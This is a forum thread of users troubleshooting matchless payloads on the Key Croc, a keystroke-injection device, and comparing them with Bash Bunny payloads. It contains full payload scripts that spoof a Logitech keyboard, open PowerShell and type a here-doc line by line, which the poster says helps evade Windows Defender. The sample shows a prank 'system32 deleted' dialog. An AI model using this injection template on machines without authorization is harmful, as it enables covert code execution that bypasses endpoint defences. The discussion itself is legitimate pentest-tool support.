Compatibility with bashbunny (matchless) payloads

[floyd-fuh]

Hi there,

I have a keycroc and I like it and was wondering how the compatibility with my old bashbunny payloads is? And what about language files for the keyboard, is there a reason why not all of the ones from the bashbunny payload git are included in the key croc repo?

cheers, floyd

[hak5darren]

There is quite a bit of overlap between the Hak5 language that is Ducky Script for the Bash Bunny and the Key Croc. Some simple payloads may indeed be copy/paste jobs. They're both interpreting with Bash at the core, and a set of Ducky Script commands on top of that. This page will show which commands are available for which products: https://docs.hak5.org/hc/en-us/articles/360049449314-Ducky-Script-Command-Reference

The reason the Bash Bunny and Key Croc have different language files is because the Key Croc uses an inverted key value pair to determine which key was pressed, and includes several aliases as it relates to multiple combinations and duplicates of keys. For instance, if someone presses ALT-ENTER is that using the ALT key on the left, or the right? And don't forget, there's an ENTER key on the numpad too. That's just one small example - but it gets long and complex quickly.

[floyd-fuh]

Thanks for the info, that's helpful to have that overview of commands supported.

I was just trying to run the Key Croc like a BashBunny (without a MATCH rule), but for some reason this doesn't work (I don't plug-in a keyboard into the Key Croc):

ATTACKMODE HID

LED SETUP

# File to type
cat <<'EOF' > "$FILE"
start "https://www.youtube.com/watch?v=ub82Xb1C8os"
[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
$oReturn=[System.Windows.Forms.Messagebox]::Show("Deleted C:\Windows\system32\ :)")
exit
EOF

#run payload with powershell

Q GUI r

Q DELAY 200

Q STRING powershell
Q ENTER
Q DELAY 500

if [ ! -f "$FILE" ]
then
    Q STRING echo \"File not found\"
    LED ERROR
    Q DELAY 5000
    exit
fi
Q ENTER

while IFS= read -r line
do
    LED B
    Q STRING "$line"
    Q ENTER
    LED W
    Q DELAY 200
done < "$FILE"

LED G

It's a generic script that would type the HERE-DOC line by line into powershell (better to circumvent things like Windows Defender ATP). We would contribute it to the library, but it only works for me on the bashbunny. Any idea why not on the Key Croc? The only idea I have is that there is no "MATCH" command (unlike in all the examples in the library of Key Croc), could that be it?

[hak5darren]

Try it interactively. I suspect the ATTACKMODE HID at the top is part of the problem - as well as a possible race condition at boot. The Key Croc boots by default in ATTACKMODE HID with the VID and PID cloned - however the execution order is to run the matchless payload before this is done.

It could be as simple as removing the ATTACKMODE HID command and adding a sleep, or checking the /tmp/mode or /tmp/vidpid file to see that the Key Croc has fully booted and entered ATTACKMODE HID before continuing with your payload.

I'm tagging @dallaswinger here who wrote the framework and can give you a more thorough answer.

[floyd-fuh]

I have tried a lot of configurations now, including combinations of:

• MacOS creates a ._payload.txt in the payloads directory and the same for config.txt, executed a find command to delete all of these before ejecting KeyCroc (I did this every time after I noticed this)
• specifying ATTACKMODE and not specifying it, with and without PID/VID
• Adding delays
• Changing config.txt
• Eject the USB in ARMING mode properly VS unplugging (my Mac has some ejecting issues that's why this happened)

I tried so many things by now and I'm still unsure what combinations work. However, for now the following combination seems to work:

• Ejecting USB from ARMING mode properly
• config.txt with only DUCKY_LANG us
• payload.txt with:

ATTACKMODE HID VID_0X046d PID_0X0203 MAN_Logitech SN_0 PROD_M2452_Keyboard

FILE="/tmp/tmp_powershell_script.txt"

# File to type
cat <<'EOF' > "$FILE"
[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
$oReturn=[System.Windows.Forms.Messagebox]::Show("Deleted C:\Windows\system32\ :)")
start "https://www.youtube.com/watch?v=ub82Xb1C8os"
exit
EOF

#run payload with powershell
LED ATTACK

Q GUI r

Q DELAY 200

Q STRING powershell
Q ENTER
Q DELAY 500

if [ ! -f "$FILE" ]
then
    Q STRING echo \"File not found\"
    LED ERROR
    Q DELAY 5000
    exit
fi
Q ENTER

while IFS= read -r line
do
    LED STAGE1
    Q STRING "$line"
    Q ENTER
    LED STAGE3
    Q DELAY 200
done < "$FILE"

LED FINISH

I think it would be helpful if you could add some KeyCroc howtos that have matchless payloads, there is none in the library and I don't think it works when you specify VID or PID in config.txt (but as said, I'm unsure about the exact mechanics). I think config.txt must be pretty empty to do matchless payloads.

Btw. I think it would be awesome to have a linter/script that can run on a PC and checks config.txt and the payload.txt for syntax errors and combinations of configurations that are not a good match.

[konstantingoretzki]

Looks like currently (version 1.3_510) the detection and therefore execution of matchless payloads is broken. https://forums.hak5.org/topic/55695-fix-for-matchless-payloads-not-running/ This fix helped me to get it working. There are also some explanations under which conditions the fix will / won't work.